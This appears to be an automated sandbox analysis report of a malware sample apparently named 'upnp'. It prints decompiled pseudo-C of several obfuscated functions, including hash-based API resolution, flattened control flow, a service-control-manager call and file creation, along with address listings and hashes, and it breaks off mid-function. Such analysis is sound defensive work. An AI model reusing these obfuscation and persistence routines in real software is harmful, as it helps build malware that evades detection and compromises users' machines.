                                                                                • API ID: FileFindFirst
                                                                                • String ID: .
                                                                                • API String ID: 1974802433-248832578
                                                                                • Opcode ID: 1ced521f5b6c774d10735e285775e1f982f1765aed5f6cc181f8f23ea05c9d7d
                                                                                • Instruction ID: 1df1eac9d9e5d214ba092aa23eaebb48a13f177ce3090533b93e5e98d8d51e5c
                                                                                • Opcode Fuzzy Hash: 1ced521f5b6c774d10735e285775e1f982f1765aed5f6cc181f8f23ea05c9d7d
                                                                                • Instruction Fuzzy Hash: 7C51267170820147CB2EAB68D8457FB36AA9B9D710F014919F856CB351EF76CFC583A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00315040, Relevance: 1.7, APIs: 1, Instructions: 248memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 658 315040-315057 659 31505c 658->659 660 315060-315066 659->660 661 31506c 660->661 662 3151af-3151b5 660->662 665 315072-315078 661->665 666 315367-31536e 661->666 663 3152f9-3152ff 662->663 664 3151bb 662->664 673 315301-315308 663->673 674 3152e8-3152ee 663->674 669 3151c1-3151c7 664->669 670 315277-31527e 664->670 671 3150f9-3150ff 665->671 672 31507a 665->672 667 315370-315386 call 313f00 call 313e60 666->667 668 31538b-315396 666->668 667->668 703 3153b3-3153b6 668->703 704 315398-3153ae call 313f00 call 313e60 668->704 678 31526d-315272 669->678 679 3151cd-3151d3 669->679 684 315280-315296 call 313f00 call 313e60 670->684 685 31529b-3152c5 670->685 680 315101-315107 671->680 681 315153-31515a 671->681 682 3150c2-3150c9 672->682 683 31507c-315082 672->683 675 315325-315330 673->675 676 31530a-315320 call 313f00 call 313e60 673->676 686 3152f4 674->686 687 3153b9-3153c0 674->687 725 315332-315348 call 313f00 call 313e60 675->725 726 31534d-31535b RtlAllocateHeap 675->726 676->675 678->660 679->674 692 3151d9-3151e0 679->692 680->674 693 31510d-315114 680->693 695 315177-315182 681->695 696 31515c-315172 call 313f00 call 313e60 681->696 688 3150e6-3150e9 682->688 689 3150cb-3150e1 call 313f00 call 313e60 682->689 697 315084-31508a 683->697 698 3150ad-3150c0 683->698 684->685 717 3152e2 685->717 718 3152c7-3152dd call 313f00 call 313e60 685->718 686->659 719 3150ef-3150f4 688->719 689->688 705 3151e2-3151f8 call 313f00 call 313e60 692->705 706 3151fd-31521f 692->706 707 315131-31514e 693->707 708 315116-31512c call 313f00 call 313e60 693->708 740 315184-31519a call 313f00 call 313e60 695->740 741 31519f-3151aa 695->741 696->695 697->674 712 315090-3150ab call 3142c0 697->712 698->660 703->687 704->703 705->706 706->719 749 315225-31522c 706->749 707->659 708->707 712->659 717->674 718->717 719->659 725->726 726->687 742 31535d-315362 726->742 740->741 741->659 742->659 758 315249-315268 749->758 759 31522e-315244 call 313f00 call 313e60 749->759 758->660 759->758
                                                                                C-Code - Quality: 61%
                                                                                			E00315040(intOrPtr __ecx, intOrPtr __edx) {
				char _v4;
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				void* _v36;
				intOrPtr _v44;
				signed int _v52;
				void* _v68;
				void* __ebx;
				void* __ebp;
				void* _t16;
				void* _t17;
				void* _t23;
				void* _t26;
				void* _t29;
				void* _t31;
				void* _t35;
				void* _t37;
				void* _t41;
				void* _t42;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t58;
				intOrPtr* _t101;
				void* _t103;
				signed int _t104;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t115;
				void* _t116;

				_t101 = _v12;
				_t58 = 0;
				_v16 = __edx;
				_t112 = 0;
				_v20 = __ecx;
				_t104 = 0x1ca940c1;
				while(1) {
					_t16 = _v28;
					while(1) {
						L2:
						_t115 = _t104 - 0x12f72f95;
						if(_t115 <= 0) {
							break;
						}
						__eflags = _t104 - 0x26342ffd;
						if(__eflags > 0) {
							__eflags = _t104 - 0x2fab56c4;
							if(_t104 != 0x2fab56c4) {
								goto L40;
							} else {
								_t17 =  *0x31e494;
								__eflags = _t17;
								if(_t17 == 0) {
									_t17 = E00313E60(_t58, E00313F00(0x9bab0b12), 0x7facde30, _t112);
									 *0x31e494 = _t17;
								}
								_t105 =  *_t17();
								__eflags =  *0x31dd18;
								if( *0x31dd18 == 0) {
									 *0x31dd18 = E00313E60(_t58, E00313F00(0x9bab0b12), 0x9ff0609c, _t112);
								}
								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
								_t58 = _t16;
								__eflags = _t58;
								if(_t58 != 0) {
									_t104 = 0x8956eec;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t23 =  *0x31e484;
								__eflags = _t23;
								if(_t23 == 0) {
									_t23 = E00313E60(_t58, E00313F00(0x26f5757c), 0x9e91db81, _t112);
									 *0x31e484 = _t23;
								}
								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
								asm("sbb esi, esi");
								_t26 =  *0x31e18c;
								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
								__eflags = _t26;
								if(_t26 == 0) {
									_t26 = E00313E60(_t58, E00313F00(0x26f5757c), 0x268fe5f0, _t112);
									 *0x31e18c = _t26;
								}
								_t16 =  *_t26(_v44);
								goto L40;
							} else {
								__eflags = _t104 - 0x1ca940c1;
								if(_t104 == 0x1ca940c1) {
									_t104 = 0x2fab56c4;
									continue;
								} else {
									__eflags = _t104 - 0x254bd927;
									if(_t104 != 0x254bd927) {
										L40:
										__eflags = _t104 - 0x1f0f293e;
										if(_t104 != 0x1f0f293e) {
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										}
									} else {
										_t50 =  *0x31e29c;
										__eflags = _t50;
										if(_t50 == 0) {
											_t50 = E00313E60(_t58, E00313F00(0x26f5757c), 0x4574c66, _t112);
											 *0x31e29c = _t50;
										}
										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
										__eflags = _t51;
										if(_t51 == 0) {
											L13:
											_t104 = 0x11e09e52;
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										} else {
											_t52 =  *0x31de08;
											__eflags = _t52;
											if(_t52 == 0) {
												_t52 = E00313E60(_t58, E00313F00(0x9bab0b12), 0xd8ef4c49, _t112);
												 *0x31de08 = _t52;
											}
											_t53 =  *_t52();
											_t104 = 0x128dff18;
											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
											_t16 = _t58 + _v52 * 0x2c;
											__eflags = _t103 - _t16;
											_v68 = _t16;
											_t101 =  >=  ? _t58 : _t103;
											continue;
										}
										L55:
									}
								}
							}
						}
						L54:
						return _t16;
						goto L55;
					}
					if(_t115 == 0) {
						_t29 =  *0x31e494;
						__eflags = _t29;
						if(_t29 == 0) {
							_t29 = E00313E60(_t58, E00313F00(0x9bab0b12), 0x7facde30, _t112);
							 *0x31e494 = _t29;
						}
						_t107 =  *_t29();
						_t31 =  *0x31df30;
						__eflags = _t31;
						if(_t31 == 0) {
							_t31 = E00313E60(_t58, E00313F00(0x9bab0b12), 0x5010a54d, _t112);
							 *0x31df30 = _t31;
						}
						return  *_t31(_t107, 0, _t58);
					}
					_t116 = _t104 - 0x10f7fbef;
					if(_t116 > 0) {
						__eflags = _t104 - 0x11e09e52;
						if(_t104 == 0x11e09e52) {
							_t35 =  *0x31e494;
							__eflags = _t35;
							if(_t35 == 0) {
								_t35 = E00313E60(_t58, E00313F00(0x9bab0b12), 0x7facde30, _t112);
								 *0x31e494 = _t35;
							}
							_t108 =  *_t35();
							_t37 =  *0x31df30;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E00313E60(_t58, E00313F00(0x9bab0b12), 0x5010a54d, _t112);
								 *0x31df30 = _t37;
							}
							 *_t37(_t108, 0, _t112);
							_t104 = 0x12f72f95;
							continue;
						} else {
							__eflags = _t104 - 0x128dff18;
							if(_t104 != 0x128dff18) {
								goto L40;
							} else {
								_t41 =  *0x31e270;
								__eflags = _t41;
								if(_t41 == 0) {
									_t41 = E00313E60(_t58, E00313F00(0x26f5757c), 0x56e230f9, _t112);
									 *0x31e270 = _t41;
								}
								_t42 =  *_t41(_v20,  *_t101, 1);
								__eflags = _t42;
								_v36 = _t42;
								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
								while(1) {
									_t16 = _v28;
									goto L2;
								}
							}
						}
					} else {
						if(_t116 == 0) {
							_t45 =  *0x31e200;
							__eflags = _t45;
							if(_t45 == 0) {
								_t45 = E00313E60(_t58, E00313F00(0x26f5757c), 0x16d40839, _t112);
								 *0x31e200 = _t45;
							}
							 *_t45(_v16, 1, _t112);
							goto L13;
						} else {
							if(_t104 == 0x5d498c4) {
								_t101 = _t101 + 0x2c;
								__eflags = _t101 - _t16;
								asm("sbb esi, esi");
								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
								goto L2;
							} else {
								if(_t104 != 0x8956eec) {
									goto L40;
								} else {
									_t112 = E003142C0(_t58, 0x2000);
									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						}
					}
					goto L54;
				}
			}









































                                                                                0x00315047
                                                                                0x0031504b
                                                                                0x0031504d
                                                                                0x00315051
                                                                                0x00315053
                                                                                0x00315057
                                                                                0x0031505c
                                                                                0x0031505c
                                                                                0x00315060
                                                                                0x00315060
                                                                                0x00315060
                                                                                0x00315066
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003151af
                                                                                0x003151b5
                                                                                0x003152f9
                                                                                0x003152ff
                                                                                0x00000000
                                                                                0x00315301
                                                                                0x00315301
                                                                                0x00315306
                                                                                0x00315308
                                                                                0x0031531b
                                                                                0x00315320
                                                                                0x00315320
                                                                                0x00315327
                                                                                0x0031532e
                                                                                0x00315330
                                                                                0x00315348
                                                                                0x00315348
                                                                                0x00315355
                                                                                0x00315357
                                                                                0x00315359
                                                                                0x0031535b
                                                                                0x0031535d
                                                                                0x0031505c
                                                                                0x0031505c
                                                                                0x00000000
                                                                                0x0031505c
                                                                                0x0031505c
                                                                                0x0031535b
                                                                                0x003151bb
                                                                                0x003151bb
                                                                                0x00315277
                                                                                0x0031527c
                                                                                0x0031527e
                                                                                0x00315291
                                                                                0x00315296
                                                                                0x00315296
                                                                                0x003152ac
                                                                                0x003152b0
                                                                                0x003152b2
                                                                                0x003152bd
                                                                                0x003152c3
                                                                                0x003152c5
                                                                                0x003152d8
                                                                                0x003152dd
                                                                                0x003152dd
                                                                                0x003152e6
                                                                                0x00000000
                                                                                0x003151c1
                                                                                0x003151c1
                                                                                0x003151c7
                                                                                0x0031526d
                                                                                0x00000000
                                                                                0x003151cd
                                                                                0x003151cd
                                                                                0x003151d3
                                                                                0x003152e8
                                                                                0x003152e8
                                                                                0x003152ee
                                                                                0x0031505c
                                                                                0x0031505c
                                                                                0x00000000
                                                                                0x0031505c
                                                                                0x0031505c
                                                                                0x003151d9
                                                                                0x003151d9
                                                                                0x003151de
                                                                                0x003151e0
                                                                                0x003151f3
                                                                                0x003151f8
                                                                                0x003151f8
                                                                                0x0031521b
                                                                                0x0031521d
                                                                                0x0031521f
                                                                                0x003150ef
                                                                                0x003150ef
                                                                                0x0031505c
                                                                                0x0031505c
                                                                                0x00000000
                                                                                0x0031505c
                                                                                0x00315225
                                                                                0x00315225
                                                                                0x0031522a
                                                                                0x0031522c
                                                                                0x0031523f
                                                                                0x00315244
                                                                                0x00315244
                                                                                0x00315249
                                                                                0x0031524e
                                                                                0x0031525b
                                                                                0x0031525d
                                                                                0x0031525f
                                                                                0x00315261
                                                                                0x00315265
                                                                                0x00000000
                                                                                0x00315265
                                                                                0x00000000
                                                                                0x0031521f
                                                                                0x003151d3
                                                                                0x003151c7
                                                                                0x003151bb
                                                                                0x003153c0
                                                                                0x003153c0
                                                                                0x00000000
                                                                                0x003153c0
                                                                                0x0031506c
                                                                                0x00315367
                                                                                0x0031536c
                                                                                0x0031536e
                                                                                0x00315381
                                                                                0x00315386
                                                                                0x00315386
                                                                                0x0031538d
                                                                                0x0031538f
                                                                                0x00315394
                                                                                0x00315396
                                                                                0x003153a9
                                                                                0x003153ae
                                                                                0x003153ae
                                                                                0x00000000
                                                                                0x003153b7
                                                                                0x00315072
                                                                                0x00315078
                                                                                0x003150f9
                                                                                0x003150ff
                                                                                0x00315153
                                                                                0x00315158
                                                                                0x0031515a
                                                                                0x0031516d
                                                                                0x00315172
                                                                                0x00315172
                                                                                0x00315179
                                                                                0x0031517b
                                                                                0x00315180
                                                                                0x00315182
                                                                                0x00315195
                                                                                0x0031519a
                                                                                0x0031519a
                                                                                0x003151a3
                                                                                0x003151a5
                                                                                0x00000000
                                                                                0x00315101
                                                                                0x00315101
                                                                                0x00315107
                                                                                0x00000000
                                                                                0x0031510d
                                                                                0x0031510d
                                                                                0x00315112
                                                                                0x00315114
                                                                                0x00315127
                                                                                0x0031512c
                                                                                0x0031512c
                                                                                0x00315139
                                                                                0x0031513b
                                                                                0x0031513d
                                                                                0x0031514b
                                                                                0x0031505c
                                                                                0x0031505c
                                                                                0x00000000
                                                                                0x0031505c
                                                                                0x0031505c
                                                                                0x00315107
                                                                                0x0031507a
                                                                                0x0031507a
                                                                                0x003150c2
                                                                                0x003150c7
                                                                                0x003150c9
                                                                                0x003150dc
                                                                                0x003150e1
                                                                                0x003150e1
                                                                                0x003150ed
                                                                                0x00000000
                                                                                0x0031507c
                                                                                0x00315082
                                                                                0x003150ad
                                                                                0x003150b0
                                                                                0x003150b2
                                                                                0x003150ba
                                                                                0x00000000
                                                                                0x00315084
                                                                                0x0031508a
                                                                                0x00000000
                                                                                0x00315090
                                                                                0x0031509a
                                                                                0x003150a8
                                                                                0x0031505c
                                                                                0x0031505c
                                                                                0x00000000
                                                                                0x0031505c
                                                                                0x0031505c
                                                                                0x0031508a
                                                                                0x00315082
                                                                                0x0031507a
                                                                                0x00000000
                                                                                0x00315078

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,00318AC8,?,3251FEFE,?,?), ref: 00315355
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                • Associated: 00000010.00000002.2321183753.0000000000310000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321193940.000000000031D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321198666.000000000031F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_310000_upnp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 2e39acda01573f725909de7c56cd4df64cb750c6154cd65177efa7d10d338663
                                                                                • Instruction ID: 544f758e97ed7d2ad81f8de22cccf1ec0fa9f20082306d5cd0d75c2dbcd2bd37
                                                                                • Opcode Fuzzy Hash: 2e39acda01573f725909de7c56cd4df64cb750c6154cd65177efa7d10d338663
                                                                                • Instruction Fuzzy Hash: 49810432B447109BDB1EAFB98C917EA36EE9BDC740F024829F811DF291EA318D8147D1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00319860, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 195serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 73%
                                                                                			E00319860() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* __ebp;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t62;
				void* _t64;
				void* _t69;
				void* _t72;
				void* _t92;
				void* _t93;
				intOrPtr _t94;
				void* _t97;
				void* _t98;

				_t64 = 0;
				_t28 = 0x29f9e503;
				_t92 = _v528;
				_t2 = _t64 + 1; // 0x1
				_t94 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t97 = _t28 - 0x13fee53b;
						if(_t97 > 0) {
							break;
						}
						if(_t97 == 0) {
							__eflags =  *0x31e310;
							if( *0x31e310 == 0) {
								 *0x31e310 = E00313E60(_t64, E00313F00(0x26f5757c), 0x9ba7cd1, _t94);
							}
							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t92 = _t49;
							__eflags = _t92;
							if(_t92 == 0) {
								_t28 = 0x23c48583;
							} else {
								_t50 =  *0x31e54c; // 0x50e1e8
								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
								_t28 = 0xc471eb;
							}
							continue;
						} else {
							_t98 = _t28 - 0x9835f84;
							if(_t98 > 0) {
								__eflags = _t28 - 0xc0f0991;
								if(_t28 != 0xc0f0991) {
									goto L36;
								} else {
									_t69 =  *0x31dbd8;
									__eflags = _t69;
									if(_t69 == 0) {
										_t69 = E00313E60(_t64, E00313F00(0xd9518805), 0x141622d6, _t94);
										 *0x31dbd8 = _t69;
									}
									_t53 =  *0x31e54c; // 0x50e1e8
									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
									__eflags = _t56;
									_t28 = 0x9835f84;
									_t64 =  ==  ? _t94 : _t64;
									continue;
								}
							} else {
								if(_t98 == 0) {
									E00317C60(_t94);
									_t28 = 0x6addd5c;
									continue;
								} else {
									if(_t28 == 0xc471eb) {
										_v528 = 0xc1a3;
										_t28 = 0x179ed98e;
										_v528 = _v528 + 0xffff1ad7;
										_v528 = _v528 ^ 0xffffdc53;
										continue;
									} else {
										if(_t28 != 0x6addd5c) {
											goto L36;
										} else {
											_t60 =  *0x31e3f4;
											if(_t60 == 0) {
												_t60 = E00313E60(_t64, E00313F00(0x9bab0b12), 0x7dc9b9bb, _t94);
												 *0x31e3f4 = _t60;
											}
											 *_t60(0,  &_v524, 0x104);
											_t62 = E00313D00( &_v536);
											_t72 =  *0x31e54c; // 0x50e1e8
											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
											_t28 = 0x39ea8110;
											continue;
										}
									}
								}
							}
						}
						L42:
					}
					__eflags = _t28 - 0x29f9e503;
					if(__eflags > 0) {
						__eflags = _t28 - 0x39ea8110;
						if(_t28 == 0x39ea8110) {
							_t29 =  *0x31dbd8;
							__eflags = _t29;
							if(_t29 == 0) {
								_t29 = E00313E60(_t64, E00313F00(0xd9518805), 0x141622d6, _t94);
								 *0x31dbd8 = _t29;
							}
							 *_t29(0, 0x25, 0, 0,  &_v524);
							_t31 =  *0x31e54c; // 0x50e1e8
							_t32 = _t31 + 0x234;
							__eflags = _t31 + 0x234;
							E00313040(_t32);
							goto L41;
						} else {
							goto L36;
						}
					} else {
						if(__eflags == 0) {
							_t37 =  *0x31e494;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E00313E60(_t64, E00313F00(0x9bab0b12), 0x7facde30, _t94);
								 *0x31e494 = _t37;
							}
							_t93 =  *_t37();
							_t39 =  *0x31dd18;
							__eflags = _t39;
							if(_t39 == 0) {
								_t39 = E00313E60(_t64, E00313F00(0x9bab0b12), 0x9ff0609c, _t94);
								 *0x31dd18 = _t39;
							}
							_t40 =  *_t39(_t93, 8, 0x480);
							 *0x31e54c = _t40;
							__eflags = _t40;
							if(_t40 == 0) {
								L41:
								return _t64;
							} else {
								 *((intOrPtr*)(_t40 + 4)) = E00317E40;
								_t28 = 0x13fee53b;
								goto L1;
							}
						} else {
							__eflags = _t28 - 0x179ed98e;
							if(_t28 == 0x179ed98e) {
								__eflags =  *0x31e18c;
								if( *0x31e18c == 0) {
									 *0x31e18c = E00313E60(_t64, E00313F00(0x26f5757c), 0x268fe5f0, _t94);
								}
								CloseServiceHandle(_t92); // executed
								_t28 = 0xc0f0991;
								goto L1;
							} else {
								__eflags = _t28 - 0x23c48583;
								if(_t28 != 0x23c48583) {
									goto L36;
								} else {
									_v528 = 0x5332;
									_v528 = _v528 << 6;
									_v528 = _v528 >> 0xf;
									_v528 = _v528 + 0xffffb18f;
									_v528 = _v528 >> 3;
									_v528 = _v528 ^ 0x1ffff62b;
									_t47 =  *0x31e54c; // 0x50e1e8
									 *((intOrPtr*)(_t47 + 8)) = 0x317e30;
									_t28 = 0xc0f0991;
									goto L1;
								}
							}
						}
					}
					goto L42;
					L36:
					__eflags = _t28 - 0x305b3459;
				} while (_t28 != 0x305b3459);
				return _t64;
				goto L42;
			}






























                                                                                0x00319868
                                                                                0x0031986a
                                                                                0x00319871
                                                                                0x00319875
                                                                                0x00319875
                                                                                0x00319878
                                                                                0x00319880
                                                                                0x00319880
                                                                                0x00319880
                                                                                0x00319880
                                                                                0x00319885
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0031988b
                                                                                0x00319993
                                                                                0x00319995
                                                                                0x003199ad
                                                                                0x003199ad
                                                                                0x003199bb
                                                                                0x003199bd
                                                                                0x003199bf
                                                                                0x003199c1
                                                                                0x003199d8
                                                                                0x003199c3
                                                                                0x003199c3
                                                                                0x003199c8
                                                                                0x003199ce
                                                                                0x003199ce
                                                                                0x00000000
                                                                                0x00319891
                                                                                0x00319891
                                                                                0x00319896
                                                                                0x00319936
                                                                                0x0031993b
                                                                                0x00000000
                                                                                0x00319941
                                                                                0x00319941
                                                                                0x00319947
                                                                                0x00319949
                                                                                0x00319961
                                                                                0x00319963
                                                                                0x00319963
                                                                                0x00319969
                                                                                0x0031997d
                                                                                0x0031997f
                                                                                0x00319981
                                                                                0x00319986
                                                                                0x00000000
                                                                                0x00319986
                                                                                0x0031989c
                                                                                0x0031989c
                                                                                0x00319927
                                                                                0x0031992c
                                                                                0x00000000
                                                                                0x003198a2
                                                                                0x003198a7
                                                                                0x00319905
                                                                                0x0031990d
                                                                                0x00319912
                                                                                0x0031991a
                                                                                0x00000000
                                                                                0x003198a9
                                                                                0x003198ae
                                                                                0x00000000
                                                                                0x003198b4
                                                                                0x003198b4
                                                                                0x003198bb
                                                                                0x003198ce
                                                                                0x003198d3
                                                                                0x003198d3
                                                                                0x003198e4
                                                                                0x003198ea
                                                                                0x003198ef
                                                                                0x003198f5
                                                                                0x003198fb
                                                                                0x00000000
                                                                                0x003198fb
                                                                                0x003198ae
                                                                                0x003198a7
                                                                                0x0031989c
                                                                                0x00319896
                                                                                0x00000000
                                                                                0x0031988b
                                                                                0x003199e2
                                                                                0x003199e7
                                                                                0x00319ae3
                                                                                0x00319ae8
                                                                                0x00319b02
                                                                                0x00319b07
                                                                                0x00319b09
                                                                                0x00319b1c
                                                                                0x00319b21
                                                                                0x00319b21
                                                                                0x00319b33
                                                                                0x00319b35
                                                                                0x00319b3e
                                                                                0x00319b3e
                                                                                0x00319b44
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003199ed
                                                                                0x003199ed
                                                                                0x00319a73
                                                                                0x00319a78
                                                                                0x00319a7a
                                                                                0x00319a8d
                                                                                0x00319a92
                                                                                0x00319a92
                                                                                0x00319a99
                                                                                0x00319a9b
                                                                                0x00319aa0
                                                                                0x00319aa2
                                                                                0x00319ab5
                                                                                0x00319aba
                                                                                0x00319aba
                                                                                0x00319ac7
                                                                                0x00319ac9
                                                                                0x00319ace
                                                                                0x00319ad0
                                                                                0x00319b4f
                                                                                0x00319b58
                                                                                0x00319ad2
                                                                                0x00319ad2
                                                                                0x00319ad9
                                                                                0x00000000
                                                                                0x00319ad9
                                                                                0x003199f3
                                                                                0x003199f3
                                                                                0x003199f8
                                                                                0x00319a47
                                                                                0x00319a49
                                                                                0x00319a61
                                                                                0x00319a61
                                                                                0x00319a67
                                                                                0x00319a69
                                                                                0x00000000
                                                                                0x003199fa
                                                                                0x003199fa
                                                                                0x003199ff
                                                                                0x00000000
                                                                                0x00319a05
                                                                                0x00319a05
                                                                                0x00319a0d
                                                                                0x00319a12
                                                                                0x00319a17
                                                                                0x00319a1f
                                                                                0x00319a24
                                                                                0x00319a2c
                                                                                0x00319a31
                                                                                0x00319a38
                                                                                0x00000000
                                                                                0x00319a38
                                                                                0x003199ff
                                                                                0x003199f8
                                                                                0x003199ed
                                                                                0x00000000
                                                                                0x00319aea
                                                                                0x00319aea
                                                                                0x00319aea
                                                                                0x00319b01
                                                                                0x00000000

                                                                                APIs
                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,0050E1D0), ref: 0031997D
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 003199BB
                                                                                • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 00319A67
                                                                                • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 00319B33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                • Associated: 00000010.00000002.2321183753.0000000000310000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321193940.000000000031D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321198666.000000000031F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_310000_upnp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FolderPath$CloseHandleManagerOpenService
                                                                                • String ID: 2S$Y4[0$P
                                                                                • API String ID: 2382770032-1023051769
                                                                                • Opcode ID: b4430a5de515fde6be2efcf3e99ccc4ac6f77bca17b1a27e46285ac2a4e50cf7
                                                                                • Instruction ID: 17bf594a96df51f5535b5a8960f940fd5e40bec81cdcdb7c1984f5f6dfa4e8bc
                                                                                • Opcode Fuzzy Hash: b4430a5de515fde6be2efcf3e99ccc4ac6f77bca17b1a27e46285ac2a4e50cf7
                                                                                • Instruction Fuzzy Hash: 8761F631B083015BDB1EAF68ACA57EA36EADB9C704F15442EF405DF251EA30CD8587A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00318400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 105 318400-3184df 106 3184e3-3184e9 105->106 107 3185c8-3185ce 106->107 108 3184ef 106->108 109 318630-318637 107->109 110 3185d0-3185d6 107->110 111 3184f5-3184fb 108->111 112 31866c-3186b4 call 31b6e0 108->112 118 318654-318667 109->118 119 318639-31864f call 313f00 call 313e60 109->119 113 3185b1-3185b7 110->113 114 3185d8-3185e0 110->114 115 31854a-318551 111->115 116 3184fd-318503 111->116 121 3185bd-3185c7 112->121 134 3186ba 112->134 113->106 113->121 124 318600-318624 CreateFileW 114->124 125 3185e2-3185fa call 313f00 call 313e60 114->125 122 318553-318569 call 313f00 call 313e60 115->122 123 31856e-318591 115->123 126 318543-318548 116->126 127 318505-31850b 116->127 118->106 119->118 122->123 148 318593-3185a9 call 313f00 call 313e60 123->148 149 3185ae 123->149 124->121 135 318626-31862b 124->135 125->124 126->106 127->113 133 318511-318518 127->133 139 318535-318541 133->139 140 31851a-318530 call 313f00 call 313e60 133->140 142 3186c4-3186d1 134->142 143 3186bc-3186be 134->143 135->106 139->106 140->139 143->121 143->142 148->149 149->113
                                                                                C-Code - Quality: 66%
                                                                                			E00318400(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t75;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				signed int _t119;
				void* _t121;
				void* _t122;
				signed int _t123;
				intOrPtr _t124;
				void* _t126;
				void* _t129;

				_t126 = __ebp;
				_t101 = __ebx;
				_v584 = 0xdbec;
				_v584 = _v584 + 0xa437;
				_v584 = _v584 | 0x0afcf5fb;
				_v584 = _v584 ^ 0x9493ba05;
				_v584 = _v584 >> 0xc;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 ^ 0x000001bc;
				_v592 = 0x7d19;
				_v592 = _v592 << 9;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 + 0xffff07e5;
				_v592 = _v592 | 0x8aea6eef;
				_v592 = _v592 + 0xd867;
				_v592 = _v592 + 0x9c41;
				_v592 = _v592 + 0x3de0;
				_v592 = _v592 + 0x218b;
				_v592 = _v592 ^ 0x00014403;
				_v588 = 0x2591;
				_t123 = 0x4a20241;
				_v588 = _v588 * 0x7d;
				_v588 = _v588 + 0x8d68;
				_v588 = _v588 + 0xffff8911;
				_v588 = _v588 * 0x6a;
				_v588 = _v588 + 0xffff93d5;
				_v588 = _v588 ^ 0x07a13cd2;
				_v580 = 0x789;
				_v580 = _v580 >> 1;
				_v580 = _v580 ^ 0xaee58af2;
				_v580 = _v580 ^ 0xaee58936;
				_t122 = _v580;
				goto L1;
				do {
					while(1) {
						L1:
						_t129 = _t123 - 0x1aed34c4;
						if(_t129 > 0) {
							break;
						}
						if(_t129 == 0) {
							_v580 = 0xa8c00;
							_v576 = 0;
							_v596 = E0031B6E0(_v580, _v576, 0x989680, 0);
							_v592 = _t119;
							_t121 = _v588 - _v564;
							_t124 = _v596;
							asm("sbb ecx, [esp+0x3c]");
							__eflags = _v584 - _v592;
							if(__eflags < 0) {
								goto L16;
							} else {
